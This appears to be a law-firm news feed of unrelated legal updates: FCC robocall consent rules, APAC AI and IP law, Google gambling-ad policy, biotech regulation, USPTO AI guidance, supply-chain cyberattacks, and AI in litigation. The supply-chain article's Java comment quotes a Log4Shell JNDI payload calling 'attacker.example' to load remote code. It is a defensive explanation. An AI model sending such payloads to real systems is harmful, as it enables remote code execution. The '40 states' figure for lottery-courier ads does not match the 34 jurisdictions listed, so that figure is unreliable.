On February 15, 2024, the FCC adopted the TCPA Consent Order in the above-captioned proceeding. In that rulemaking, the FCC adopted rules making it simpler for consumers to revoke consent to receive unwanted robocalls and robotexts. Callers and texters must honor these opt-out requests in a timely manner.
The TCPA Consent Order established that these rules would become effective six months after publication of a notice in the Federal Register announcing that the Office of Management and Budget (OMB) had completed its review of the modified information collection requirements under the Paperwork Reduction Act of 1995. OMB approved those modified information collection requirements on September 26, 2024.
On October 11, 2024, the FCC announced in the Federal Register that compliance with the amendments and new rules set forth in the TCPA Consent Order as contained in 47 CFR §§ 64.1200(a)(9)(i)(F), (10), (11) and (d)(3) is required as of April 11, 2025.
Background of the TCPA Rules on Revoking Consent for Unwanted Robocalls and Robotexts
The TCPA restricts robocalls and robotexts absent the prior express consent of the called party or a recognized exemption. The FCC has made clear that consumers have a right to decide which robocalls and robotexts they wish to receive by exercising their ability to grant or revoke consent to receive such calls and texts.
The FCC has now adopted new rules to strengthen consumers' ability to decide which robocalls and robotexts they wish to receive, codified its past guidance on consent to make these requirements readily accessible and apparent to callers and consumers, and closed purported loopholes that allowed wireless providers to make robocalls and robotexts that subscribers could not opt out of.
What is the Practical Impact of the TCPA Revocation Rules?
As previously discussed by FTC defense and telemarketing compliance attorney Richard B. Newman, in March 2024 the Federal Communications Commission announced that it had adopted new rules and codified previously adopted protections that make it simpler for consumers to revoke consent to unwanted robocalls and robotexts (specifically, autodialed and/or artificial/prerecorded voice calls and texts) while requiring that callers and texters honor these requests in a timely manner.
In pertinent part:
Revocation of prior express consent for autodialed, prerecorded or artificial voice calls (and autodialed texts) can be made in any reasonable manner (callers may not infringe on that right by designating an exclusive means to revoke consent that precludes the use of any other reasonable method).
Callers are required to honor do-not-call and consent revocation requests within a reasonable time, not to exceed ten (10) business days of receipt (see the illustrative sketch following this list).
Text senders are limited to a prompt one-time text message confirming a consumer’s request that no further text messages be sent under the TCPA (the longer the delay, the more difficult it will be to demonstrate that such a message falls within the original prior consent).
Revocation of consent applies only to those autodialed and/or artificial/prerecorded voice calls and texts for which consent is required.
A revocation of consent to marketing messages precludes all further telephone calls or text messages unless an enumerated exemption applies.
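For platforms that send covered texts, these rules translate into concrete recordkeeping and timing obligations. Below is a minimal illustrative sketch, in Java, of how a texting platform might log a revocation, send the single permitted confirmation message, and compute the ten-business-day outer deadline. All class and method names are hypothetical; this is a sketch of the mechanics, not a compliance implementation.

```java
import java.time.DayOfWeek;
import java.time.LocalDate;
import java.util.HashSet;
import java.util.Set;

// Hypothetical sketch of consent-revocation tracking; names are illustrative.
public class ConsentLedger {

    private final Set<String> revokedNumbers = new HashSet<>();

    // Record a revocation received through any reasonable channel (reply text,
    // voicemail, website form, etc.), send the one permitted confirmation text,
    // and log the outer deadline for honoring the request.
    public void recordRevocation(String phoneNumber, LocalDate received) {
        revokedNumbers.add(phoneNumber);
        sendConfirmationText(phoneNumber); // prompt, one-time, no marketing content
        LocalDate deadline = addBusinessDays(received, 10);
        System.out.println("Stop all covered calls/texts to " + phoneNumber
                + " no later than " + deadline);
    }

    // Gate every outbound covered message on current consent status.
    public boolean maySend(String phoneNumber) {
        return !revokedNumbers.contains(phoneNumber);
    }

    // Add N business days to a date (weekends skipped; holidays omitted for brevity).
    static LocalDate addBusinessDays(LocalDate start, int businessDays) {
        LocalDate date = start;
        int added = 0;
        while (added < businessDays) {
            date = date.plusDays(1);
            DayOfWeek day = date.getDayOfWeek();
            if (day != DayOfWeek.SATURDAY && day != DayOfWeek.SUNDAY) {
                added++;
            }
        }
        return date;
    }

    private void sendConfirmationText(String phoneNumber) {
        // Placeholder for the messaging-provider API call.
        System.out.println("Revocation confirmation sent to " + phoneNumber);
    }
}
```

In practice, a sender would typically suppress further messages immediately upon revocation; the computed date is only the regulatory outer bound.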
Telemarketers and lead generators should consult with an experienced FTC defense lawyer to discuss the scope of the new rules and protections, including, but not limited to, the scope and applicability of a revocation for one purpose to other communication purposes.
Globally, governments are grappling with the emergence of artificial intelligence ("AI"). AI technologies introduce exciting new opportunities but also bring challenges for regulators and companies across all industries. The Asia-Pacific ("APAC") region is no exception: APAC governments are adapting to AI and finding ways to encourage and regulate AI development through existing intellectual property ("IP") regimes and new legal frameworks.
AI technologies aim to simulate human intelligence by developing smart machines capable of performing tasks that have traditionally required it. The expanding market for AI ranges from machine learning to generative AI to virtual assistants to robotics, and this list merely scratches the surface.
When it comes to IP and AI, there are several critical questions for governments to consider: Can AI models be protected by existing legal frameworks within IP? Must copyright owners be human? Does a patent inventor have to be an individual? Do AI models’ training programs infringe on others’ copyrights?
To begin to answer these questions, regulators are drawing from existing IP regimes, including patent and copyright law. Some APAC countries have taken a non-binding approach, relying on existing principles to guide AI regulation. Others are drafting more specific AI regulations. The country-by-country summary below provides a brief overview of current patent and copyright laws within APAC focused on AI and IP. Additional commentary concerning updates to AI laws and regulations follows the summary.

Korea
Patent: A non-human cannot be the inventor under Korea's Patent Act, which requires "a person."
Copyright: The Copyright Act requires a human creator. Copyright is possible if the creator is a human using generative AI models as software tools and the human input amounts to more than simple prompt inputs. For example, on December 29, 2023, Korea granted copyright in a movie produced with generative AI as a "compilation work."

Japan
Patent: Under Japan's Patent Act, a natural person must be the inventor. This is the "requirement of shimei 氏名" (i.e., the name of a natural person).
Copyright: Japan's Copyright Act defines a copyright-protected work as "a creation expressing human thoughts and emotions." However, on February 29, 2024, the Agency for Cultural Affairs committee's document on the "Approach to AI and Copyright" provided that a joint work made up of both human input and AI-generated content can be eligible for copyright protection.

Taiwan
Patent: Taiwan's Patent Law does not explicitly preclude a non-human inventor; however, the Patent Examination Guidelines require a natural person to be an inventor. Formalities in Taiwan also require an inventor's name and nationality.
Copyright: The Copyright Act requires "human creative expression."

China
Patent: The inventor must be a person under China's Patent Law and the Guidelines for Examination.
Copyright: Overall, Chinese courts have recognized that when AI-generated works involve human intellectual input, the user of the AI software is the copyright owner.

Hong Kong
Patent: The Patents Ordinance in Hong Kong requires a human inventor.
Copyright: The Copyright Ordinance in Hong Kong attributes authorship to "the person by whom the arrangements necessary for the creation of the work are undertaken."

Philippines
Patent: Patent law in the Philippines requires a natural person to be the inventor.
Copyright: Generally, copyright law in the Philippines requires the author to be a natural person. The copyright in works that are partially AI-generated protects only those parts created by natural persons. The Philippines IP Office relies on the declarations of the creator claiming copyright to establish which parts of the work are AI-generated and which are not.

Vietnam
Patent: AI cannot be an IP right owner in Vietnam. The user of AI is the owner, regardless of the degree of work carried out by AI.
Copyright: Likewise, AI cannot own copyright; the user of AI is the owner, regardless of the degree of work carried out by AI.

Thailand
Patent: Patent law in Thailand requires inventors to be individuals.
Copyright: Copyright law in Thailand requires an author to be an individual.

Malaysia
Patent: Malaysia's patent law requires inventors to be individuals.
Copyright: Copyright law in Malaysia requires an author to be an individual.

Singapore
Patent: Patent law requires inventors to be natural persons; however, the owner can be a natural person or a legal entity.
Copyright: In Singapore, it is implicit in provisions of the Copyright Act that the author must be a natural person.

Indonesia
Patent: Under Indonesia's patent law, the inventor may be an individual or a legal entity.
Copyright: Under copyright law in Indonesia, the author of a work may be an individual or a legal entity.

India
Patent: India's patent law requires inventors to be natural persons.
Copyright: The copyright law contains a requirement of "originality," which the courts interpret as requiring "intellectual effort by humans."

Australia
Patent: The Full Federal Court in Australia ruled that an inventor must be a natural person.
Copyright: Copyright law in Australia requires the author to be a human.

New Zealand
Patent: A court in New Zealand has ruled that AI cannot be an inventor under the Patents Act.
Copyright: A court in New Zealand has ruled that AI cannot be the author under the provisions of the Copyright Act. Updated legislation clarifies that the owner of a computer-generated work is the person who "made the arrangements necessary" for its creation.
AI Regulation and Infringement
KOREA: Court decisions have held that web scraping, or pulling information from a competitor's website or database, infringes the competitor's database rights under the Copyright Act and the UCPA. In Korea, the need for parties to obtain permission to use copyrighted works for training AI is emphasized in guidelines: the Copyright Commission published guidelines on copyright and AI in December 2023, noting the growing need for legislation on AI-generated works. The English version of the guidelines was released in April 2024.
JAPAN: The Copyright Act, as amended effective January 1, 2019, provides very broad rights to use copyrighted works without permission for training AI, as long as the training is for the purpose of technological development. The Japan Agency for Cultural Affairs (ACA) released its draft "Approach to AI and Copyright" for public comment on January 23, 2024, and the ACA committee aims to introduce checks on this freedom and to provide more protection for Japan-based content creators and copyright holders. Additional changes were made to the draft after consideration of some 25,000 comments as of February 29, 2024. Also, the Ministry of Internal Affairs and Communications and the Ministry of Economy, Trade and Industry compiled the AI Guidelines for Business Ver. 1.0 in Japan on April 19, 2024.
TAIWAN: Using copyrighted works to train AI models involves "reproduction," which constitutes an infringement unless there is consent or a license to use the work. Taiwan's IP Office released an interpretation circular clarifying AI issues in June 2023. Following that circular, the Taiwan cabinet approved draft guidelines for the use of generative AI by the executive branch of the Taiwan government in August 2023. The executive branch has also confirmed that it is in the process of formulating the government's version of the Draft AI Law, which is expected to be published this year.
CHINA: Interim Measures for the Management of Generative Artificial Intelligence Services, promulgated in July 2023, require that generative AI services “respect intellectual property rights and commercial ethics” and that “intellectual property rights must not be infringed.” The consultation draft on Basic Security Requirements for Generative Artificial Intelligence Service, which was published in October 2023, provides detailed guidance on how to avoid IP infringement. The requirements, for example, provide specific processes concerning model training data that Chinese AI companies must adopt. Moreover, China’s draft Artificial Intelligence Law, proposed on March 16, 2024, outlines the use of copyrighted material for training purposes, and it serves as a complement to China’s current AI regulations.
HONG KONG: A review of copyright law in Hong Kong is underway. There is currently no overarching legislation regulating the use of AI, and the existing guidelines and principles mainly provide guidance on the use of personal data.
VIETNAM: AI cannot have responsibility for infringement, and there are no provisions under existing laws in Vietnam regarding the extent of responsibility of AI users for infringing acts. The Law on Protection of Consumers’ Rights will take effect on July 1, 2024. This law requires operators of large digital platforms to periodically evaluate the use of AI and fully or partially automated solutions.
THAILAND: Infringement in Thailand requires intent or implied intent, inferred, for example, from the prompts given to the AI. Thai law also provides for liability for helping or encouraging infringement by another; importantly, an AI user may be exposed to liability in that way.
MALAYSIA: An informal comment from February 2024 by the Chairman of the Malaysia IP Office provides that there may be infringement through the training and/or use of AI programs.
SINGAPORE: Singapore has a hybrid regime. The regime provides a general fair use exception, which is likely guided by US jurisprudence, per the Singapore Court of Appeal, as well as exceptions for specific types of permitted uses, for example, the computational data analysis exception. IPOS issued a Landscape Report on Issues at the Intersection of AI and IP on February 28, 2024, and a Model AI Governance Framework for Generative AI was published on May 30, 2024.
INDONESIA: A "circular," a government-issued document similar to a white paper, implies that infringement is possible in Indonesia. The nonbinding Communications and Information Ministry Circular No. 9/2023 on AI was signed in December 2023.
INDIA: Under the Copyright Act of 1957, a generative AI user has an obligation to obtain permission to use a copyright owner's works for commercial purposes. In February 2024, the Ministry of Commerce and Industry stated that India's existing IPR regime is "well-equipped to protect AI-generated works" and therefore does not require a separate category of rights. MeitY issued a revised advisory on March 15, 2024 providing that platforms and intermediaries should ensure that the use of AI models, large language models, or generative AI software or algorithms by end users does not facilitate any unlawful content stipulated under Rule 3(1)(b) of the IT Rules, in addition to any other laws.
AUSTRALIA: Any action seeking compensation for infringement of a copyright work by an AI system would need to rely on the Copyright Act of 1968. It is an infringement of copyright to reproduce or communicate works digitally without the copyright owner’s permission. Australia does not have a general “fair use” defense to copyright infringement.
NEW ZEALAND: While infringement by AI users has not yet been considered by New Zealand courts, New Zealand has more restricted "fair dealing" exceptions. A copyright review is underway in New Zealand.
Google has set the stage for a transformative change slated for July 15, 2024, providing a roadmap to extend Google Ads to daily fantasy sports (“DFS”) operators and lottery courier services across numerous U.S. states. A significant shift in the search engine’s Google Ads gambling and games policy, this move is indicative of the company’s responsiveness to the evolving legal landscape surrounding online gaming and lottery courier services. Industry stakeholders must navigate this new advertising landscape mindfully, seizing its potential within regulatory bounds. Legal advice and assistance may be needed to address the new policies and understand the new Google environment.
Google announced that it would permit these businesses to advertise on a state-by-state basis.
Approved for DFS Advertising: Alaska, California, Florida, Georgia, Kentucky, Minnesota, Nebraska, New Mexico, North Carolina, North Dakota, Oklahoma, Rhode Island, South Dakota, Utah, West Virginia, Wisconsin, and Wyoming.
Approved for Lottery Courier Advertising: Alaska, Arkansas, Colorado, District of Columbia, Idaho, Illinois, Iowa, Kansas, Kentucky, Louisiana, Maine, Maryland, Massachusetts, Minnesota, Missouri, Montana, Nebraska, New Jersey, New Mexico, New York, North Carolina, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Rhode Island, South Carolina, South Dakota, Tennessee, Texas, Vermont, West Virginia, and Wyoming.
If advertisers are targeting their ads in a state that does not require a license to conduct DFS or lottery courier service, they must be licensed in at least one other U.S. state that mandates such a license.
The Legal Context of the Updated Google Ads Policy
Google has usually been circumspect when it comes to gambling-related content, so this policy update marks a notable departure. Traditionally, its stringent restrictions limited advertising to state-run lotteries and horse racing only. The historical context here is important, as this shift from Google's previously conservative policy marks a wider change in the digital advertising of gaming activities. Now, licensed lottery courier services will be able to market themselves through Google Ads in 40 states, excluding California due to specific state restrictions. The revised guidelines correspond with the expanding endorsement and enactment of governance over online gaming and lottery operations. Nonetheless, this update enforces rigorous procedural rules and criteria for advertising compliance, encompassing adherence to both individual state regulations and the certification processes established by Google.
This paradigm shift in Google's policy echoes its latest requirements for advertisers, who are compelled to demonstrate compliance not just through licensing but also through the integrity of their ad content and search-positioning efforts, reflecting a commitment to consumer trust and regulatory adherence.
Daily Fantasy Sports Advertising: A New Playing Field
On the DFS front, Google’s policy expansion allows operators to advertise in 17 states, including jurisdictions where online sports betting remains unlegislated. DFS operators in states which currently do not permit online sports betting will remain at liberty to run Google ads. This reflects Google’s nuanced approach to advertising within the gaming industry, ensuring that ads from entities that have met state-imposed standards are available to users. DFS providers can enter new markets at the rollout, subject to regulatory compliance, including state licensing. In states without such licensing requirements, operators must nonetheless hold a valid license from another state that does enforce scrutiny of operators, underscoring Google’s effort in promoting only legitimate, reputable services.
Lottery Courier Advertising: Riding the Wave of Legalization
Entities such as Jackpocket and Lotto.com, acting as intermediaries, can now increase their visibility and customer base through Google Ads. Among other recent developments, DraftKings’ recent acquisition of Jackpocket for $750 million showcases the growing economic significance of lottery courier services. This growing market, while gaining popularity for convenience, is also varied in acceptance across states; advertisers must navigate diverse regulations and be keenly aware of states like California, where the State lottery commission has expressed restrictions and presently takes a dim view of courier operations.
Understanding Compliance: Standing At the Gate of Certification
Google's guidelines mandate that advertisers provide evidence of all aspects of their operation, from licensing to customer data protection and legal compliance. Certification thus becomes synonymous with service integrity, with Google's policy now establishing it as a prerequisite. To synchronize with this directive, advertisers must:
Hold an official license in one state, considering the dynamics of interstate variances in regulation.
Target ads with precision, respecting the complexities of state-specific legal frameworks.
Engage diligently with Google’s certification process, indicative of an advertiser’s adherence to compliance and transparency.
Advertisers seeking certification need to demonstrate compliance with rigorous legal standards, including the authentication of tickets and adherence to regulations. The process calls for delivering not just proof of licensing where required, but also extensive details pertaining to their business operations. The intent behind this comprehensive evaluation is to safeguard consumers by preventing untrustworthy services from gaining approval to advertise.
It will be particularly interesting to see how Google enforces its "licensing" requirement for vendors, such as marketing affiliates, that promote lottery/fantasy sports services indirectly. Unlike B2C fantasy sports operators or couriers, these B2B entities traditionally do not provide consumer-facing services and may not be subject to the same state licensing demands, yet they must still navigate the intricacies of Google's policy in their marketing efforts.
Implications for Advertisers: A Forward-Looking Approach
In navigating Google’s updated advertising framework, adherence to its detailed certification process is paramount to successful marketing. A failure to meet Google’s more robust standards could lead to advertising restrictions on its platform and related services—underscoring the need for meticulous strategy alignment and transparent operations.
The alterations to Google’s policy demand substantial attention to detail and legal compliance. These policy changes necessitate careful scrutiny and a proactive stance from advertisers to ensure alignment with new advertising avenues. On July 15, 2024, Google’s updated advertising policies will come into effect, after which the related policy page will be updated to reflect these changes.
Google's revisions to its policies underscore the company's pragmatic response to the dynamic realm of Internet-based lottery-related and gaming services. Notably, Google's decision enables lottery courier advertising in a majority of states, acknowledging the sector's growth. It is highly likely that other social media platforms will soon follow suit, thereby setting new standards for these businesses to adhere to if they want to take advantage of these powerful tools.
What Happened: EPA, USDA, and FDA issued a joint plan for regulatory reform under their Coordinated Framework for the Regulation of Biotechnology.
Who’s Impacted: Developers of PIPs, modified mosquitos, biopesticides, and other biotechnology products under EPA’s jurisdiction.
What Should They Consider Doing in Response: Watch the three agencies’ regulatory dockets closely and consider submitting comments once new rules or draft guidance are published that may affect their products.
Background
President Biden's executive order defined "biotechnology" as "technology that applies to or is enabled by life sciences innovation or product development." Biotechnology products thus may include organisms (plants, animals, fungi, or microbes) developed through genetic engineering or manipulation, products derived from such organisms, and products produced via cell-free synthesis. These products may, in turn, be regulated under the overlapping statutory frameworks of the Federal Insecticide, Fungicide, and Rodenticide Act (FIFRA), the Federal Food, Drug, and Cosmetic Act (FFDCA), the Plant Protection Act (PPA), the Federal Meat Inspection Act, the Poultry Products Inspection Act, and more. Therefore, close coordination between EPA, USDA, and FDA is essential to ensure effective and efficient regulation of biotechnology products.
EPA Sets Sights on PIPs, Mosquitos, and Biopesticide Products
The agencies' newly released plan identifies five biotechnology product categories where regulatory clarification or simplification is warranted: (1) modified plants; (2) modified animals; (3) modified microorganisms; (4) human drugs, biologics, and medical devices; and (5) cross-cutting issues. Under the new plan, EPA is engaged in all but the fourth of these categories.
For example, EPA has already taken steps to clarify its regulation of modified plant products, such as exempting from regulation under FIFRA and FFDCA certain plant-incorporated protectants (PIPs) created in plants using newer technologies. EPA next plans to address the scope of plant regulator PIPs and update its 2007 guidance on small-scale field testing of PIPs to reflect technological developments and harmonize with USDA containment measures.
Regarding modified animal products, EPA intends to work with USDA and FDA to coordinate and provide updated information on the regulation of modified insect and invertebrate pests. Specifically, EPA intends to provide efficacy testing guidance on genetically modified mosquitos intended for population control. As outlined in guidance published by FDA in October 2017, products intended to reduce the population of mosquitoes by killing them or interfering with their growth or development are considered “pesticides” subject to regulation by EPA, while products intended to reduce the virus/pathogen load within mosquitoes or prevent mosquito-borne disease in humans or animals are considered “new animal drugs” subject to regulation by FDA.
EPA also now intends to prioritize its review of biopesticide applications, provide technical assistance to biopesticide developers, and collaborate with state pesticide regulators to help bring new biopesticide products to market more quickly.
Further, the three agencies are making efforts to collaborate with each other and with the regulated community. The agencies jointly released plain-language information on regulatory roles, responsibilities, and processes for biotechnology products in November 2023 and now intend to explore the development of a web portal that would direct developers to the appropriate agency or office overseeing their product’s development or regulatory status. The agencies also intend to develop a mechanism for a product developer to meet with all agencies at once early in a product’s development process to clarify the agencies’ respective jurisdictions and provide initial regulatory guidance; to update their joint information-sharing memorandum of understanding; and to formally update the Coordinated Framework for the Regulation of Biotechnology by the end of the year.
Biotechnology product developers should closely monitor EPA, USDA, and FDA’s progress on the actions described above, as well as other USDA- and FDA-specific regulatory moves. Developers should assess the regulatory barriers to their products’ entry to market, consider potential fixes, and be prepared to submit feedback as the agencies propose new rules or issue draft guidance for comment.
The USPTO has a clear message for patent and trademark attorneys, patent agents, and inventors: the use of artificial intelligence (AI), including generative AI, in patent and trademark activities and filings before the USPTO entails risks that must be mitigated, and you must disclose the use of AI in the creation of an invention or in practice before the USPTO if that use is material to patentability.
The USPTO's new guidance, issued on April 11, 2024, is a counterpart to its guidance issued on February 13, 2024, which addresses the AI-assisted invention creation process. In the April 11 guidance, USPTO officials communicate the risks of using AI in preparing USPTO submissions, including patent applications, affidavits, petitions, office action responses, information disclosure statements, Patent Trial and Appeal Board (PTAB) submissions, and trademark / Trademark Trial and Appeal Board (TTAB) submissions. The common theme between the February 13 and April 11 guidance is the duty to disclose to the USPTO all information known to be material to patentability.
Building on the USPTO’s existing rules and policies, the USPTO’s April 11 guidance discusses the following:
(A) The duty of candor and good faith – each individual associated with a proceeding at the USPTO owes a duty to disclose to the USPTO all information known to be material to patentability, including information on the use of AI by inventors, parties, and practitioners.
(B) Signature requirement and corresponding certifications – using AI to draft documents without verifying the information risks "critical misstatements and omissions." Any submission to the USPTO that AI helped prepare must be carefully reviewed by practitioners, who are ultimately responsible for ensuring that it is accurate and submitted for a proper purpose.
(C) Confidentiality of information – sensitive and confidential client information risks being compromised if shared with third-party AI systems, some of which may be located outside of the United States.
(D) Foreign filing licenses and export regulations – a foreign filing license from the USPTO does not authorize the exporting of subject matter abroad for the preparation of patent applications to be filed in the United States. Practitioners must ensure data is not improperly exported when using AI.
(E) USPTO electronic systems' policies – practitioners using AI must be mindful of the terms and conditions for the USPTO's electronic systems, which prohibit the unauthorized access, actions, use, modification, or disclosure of data contained in the USPTO systems or in transit to/from them.
(F) The USPTO Rules of Professional Conduct – when using AI tools, practitioners must ensure that they are not violating the duties owed to clients. For example, practitioners must have the requisite legal, scientific, and technical knowledge to reasonably represent the client, without inappropriate reliance on AI. Practitioners also have a duty to reasonably consult with the client, including about the use of AI in accomplishing the client's objectives.
The USPTO’s April 11 guidance overall shares principles with the ethics guidelines that multiple state bars have issued related to generative AI use in practice of law, and addresses them in the patent- and trademark-specific context. Importantly, in addition to ethics considerations, the USPTO guidance reminds us that knowing or willful withholding of information about AI use under (A), overlooking AI’s misstatements leading to false certification under (B), or AI-mediated improper or unauthorized exporting of data or unauthorized access to data under (D) and (E) may lead to criminal or civil liability under federal law or penalties or sanctions by the USPTO.
On the positive side, the USPTO guidance describes the possible favorable aspects of AI “to expand access to our innovation ecosystem and lower costs for parties and practitioners…. The USPTO continues to be actively involved in the development of domestic and international measures to address AI considerations at the intersection of innovation, creativity, and intellectual property.” We expect more USPTO AI guidance to be forthcoming, so please do watch for continued updates in this area.
The FCC sent a cease-and-desist letter to DigitalIPvoice informing them of the need to investigate suspected illegal traffic. The FCC reminded them that failure to comply with the letter "may result in downstream voice service providers permanently blocking all of DigitalIPvoice's traffic."
For background, DigitalIPvoice is a gateway provider, meaning it accepts calls directly from foreign originating or intermediate providers. The Industry Traceback Group (ITG) investigated some questionable traffic back in December and identified DigitalIPvoice as the gateway provider for some of the calls. ITG informed DigitalIPvoice, and "DigitalIPvoice did not dispute that the calls were illegal."
This is problematic because, as the FCC states, "gateway providers that transmit illegal robocall traffic face serious consequences, including blocking by downstream providers of all of the provider's traffic."
Emphasis in original. Yes. The FCC sent that in BOLD to DigitalIPvoice. I love aggressive formatting choices.
The FCC then gave DigitalIPvoice steps to take to mitigate the calls in response to the notice: investigate the traffic, block the identified traffic, and report back to the FCC and the ITG on the outcome of the investigation.
The whole letter is worth reading, but a few points stand out for voice service providers and gateway providers:
You have to know who your customers are and what they are doing on your network. The FCC is requiring voice service providers and gateway providers to include know-your-customer (KYC) procedures in their robocall mitigation plans.
You have to work with the ITG. You have to have a traceback policy and procedures. All traceback requests have to be treated as a P0 priority.
You have to be able to trace the traffic you are handling. From beginning to end.
The FCC is going after robocalls hard. Protect yourself by understanding what is going to be required of your network.
The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.
The effects of supply chain cyberattacks are far-reaching, cascading to downstream organizations and lasting long after the attack was first deployed. According to an Identity Theft Resource Center report, "more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations' data" in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.
What is a supply chain cyberattack?
Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.
Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software that contains the vulnerability. For example, Apache Log4j is an open-source library that developers use to add record-keeping of system activity to their software. In November 2021, there were public reports of a Log4j remote code execution vulnerability that allowed threat actors to infiltrate target software running outdated Log4j versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j code. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, much software and many apps are still running outdated (i.e., unpatched) versions of Log4j; a brief illustrative sketch of this exposure appears after the next example.
Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and it occurs when a threat actor infiltrates and compromises software with malicious code, either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems, with downstream effects on Blackbaud's customers, which included 45,000 companies. Similarly, in May 2023, Progress Software's MOVEit file-transfer tool was targeted with a ransomware attack that allowed threat actors to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.
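To make the Log4j example above concrete, here is a minimal sketch, in Java, of the kind of routine logging call that exposed applications. The class and input are hypothetical; the behavior described in the comments reflects the publicly reported vulnerability (CVE-2021-44228) in unpatched log4j-core releases.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler; requires the log4j-api/log4j-core dependencies.
public class LoginHandler {

    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    public void handleLogin(String username) {
        // On unpatched log4j-core (reportedly versions 2.0-beta9 through 2.14.1),
        // attacker-controlled input such as "${jndi:ldap://attacker.example/x}"
        // was evaluated as a message lookup, letting the attacker load and run
        // remote code. On patched releases (2.17.1 and later), message lookups
        // are disabled and the same call simply logs the literal text.
        log.info("Login attempt for user: {}", username);
    }
}
```

The durable mitigation is the one noted above: upgrade the log4j-core dependency to a patched release and audit vendor software for bundled copies of the vulnerable library.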
Legal and Regulatory Risks
Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.
The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that initially caused the incident. For example, in the aftermath of the cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities and Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators named a company's Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.
What Steps Can Companies Take to Mitigate Risk?
First, threat actors will continue to refine their tactics and techniques, so all organizations must adapt and stay current with the regulations and legislation surrounding cybersecurity. The Cybersecurity and Infrastructure Security Agency (CISA) urges developer education on creating secure code and verifying third-party components.
Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.
Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship, since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to report attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. Some entities may also apply the same threat intelligence that they use for their own defense to their critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.
Finally, all companies should strive to minimize threats to their software supply chains by establishing strong security strategies at the ground level.
Picture this: You’ve just been retained by a new client who has been named as a defendant in a complex commercial litigation. While the client has solid grounds to be dismissed from the case at an early stage via a dispositive motion, the client is also facing cost constraints. This forces you to get creative when crafting a budget for your client’s defense. You remember the shiny new toy that is generative Artificial Intelligence (“AI”). You plan to use AI to help save costs on the initial research, and even potentially assist with brief writing. It seems you’ve found a practical solution to resolve all your client’s problems. Not so fast.
Seemingly overnight, the use of AI platforms has become the hottest thing going, including (potentially) for commercial litigators. However, like most rapidly rising technological trends, the associated pitfalls don't fully bubble to the surface until after the public has an opportunity (or several) to put the technology to the test. Indeed, the use of AI platforms to streamline legal research and writing has already begun to show its warts. Of course, just last year, prime examples of the danger of relying too heavily on AI were exposed in highly publicized cases venued in the Southern District of New York. See, e.g., Benjamin Weiser, Michael D. Cohen's Lawyer Cited Cases That May Not Exist, Judge Says, N.Y. Times (December 12, 2023); Sara Merken, New York Lawyers Sanctioned for Using Fake ChatGPT Cases in Legal Brief, Reuters (June 26, 2023).
To ensure litigators strike the appropriate balance between using technological assistance to produce legal work product and continuing to adhere to the ethical duties and professional responsibility mandated by the legal profession, below are some immediate considerations any complex commercial litigator should abide by when venturing into the world of AI.
Confidentiality
As any experienced litigator will know, involving a third party in the process of crafting a client's strategy and case theory (whether it be an expert, accountant, or investigator) inevitably raises the issue of protecting the client's privileged, proprietary, and confidential information. The same principle applies to the use of an AI platform. Indeed, when stripped of its bells and whistles, an AI platform could be viewed as another consultant employed to provide work product that will assist in the overall representation of your client. Given this reality, it is imperative that any litigator who plans to use AI also have a complete grasp of the security of that AI system, to ensure the safety of the client's privileged, proprietary, and confidential information. A failure to do so may not only result in the client's sensitive information being exposed to an insecure, and potentially harmful, online network, but may also result in a violation of the duty to make reasonable efforts to prevent the disclosure of, or unauthorized access to, the client's sensitive information. Such a duty is routinely set forth in the applicable rules of professional conduct across the country.
Oversight
